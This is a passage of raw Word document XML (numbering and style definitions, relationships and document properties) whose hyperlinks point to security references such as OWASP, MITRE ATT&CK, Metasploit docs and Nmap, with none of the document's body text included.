      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9ED02C4C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D81EA5B0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FEEAFF78">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="50D4374E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="F6E090F4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="71F2EA44">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F78C70DA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B4D4DC6C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="13236697"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAFA6148"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1BDD30C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B6A345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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1D230DEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79F403B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20F20AF4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C01ED19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1A27899"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7283D7E"/>
    <w:lvl w:ilvl="0" w:tplc="9CA04AC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="43882136">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="790679BA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="77265042">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="788651A8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1EBEA9C0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D870007E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5788821C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FB6E70AE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D461748"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0C2367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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2EEA0662"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02C6BDBC"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="325A755B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="008E8D78"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="4"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="575F271F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3090532A"/>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10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5BD668CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A94A5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4371C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABEC12E8"/>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12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="709C5D8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F088B16"/>
    <w:lvl w:ilvl="0" w:tplc="6702280E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1F9C27AE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B81A46FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6986D4B4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AE825F3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E83C0620">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="70641BDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="37261ACC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7986AC90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D24165C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1682F0C8"/>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num w:numId="1" w16cid:durableId="855845660">
    <w:abstractNumId w:val="12"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1690375803">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1926569902">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1157723057">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="403374968">
    <w:abstractNumId w:val="9"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="615481240">
    <w:abstractNumId w:val="11"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="938951502">
    <w:abstractNumId w:val="8"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="4"/>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78323740">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="128524719">
    <w:abstractNumId w:val="10"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="629750269">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1190531675">
    <w:abstractNumId w:val="13"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1073814074">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1152327122">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640"/>
    <w:rsid w:val="002E76FB"/>
    <w:rsid w:val="0035663E"/>
    <w:rsid w:val="004F70E0"/>
    <w:rsid w:val="005036FB"/>
    <w:rsid w:val="006A15E7"/>
    <w:rsid w:val="009013F4"/>
    <w:rsid w:val="00BE46BA"/>
    <w:rsid w:val="00BF7D8D"/>
    <w:rsid w:val="00C553BE"/>
    <w:rsid w:val="00E81640"/>
    <w:rsid w:val="00F835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BDE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B3A6B"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="220" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A6B"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="160" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4B556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F7D8D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF7D8D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BF7D8D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BF7D8D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009013F4"/>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9013F4"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009013F4"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00BE46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4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owasp.org/www-project-top-te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ttack.mitre.org/"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cs.metasploi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3.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/man.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9402</Words>
  <Characters>53598</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>446</Lines>
  <Paragraphs>125</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>62875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2026-04-24T19:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-26T14:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>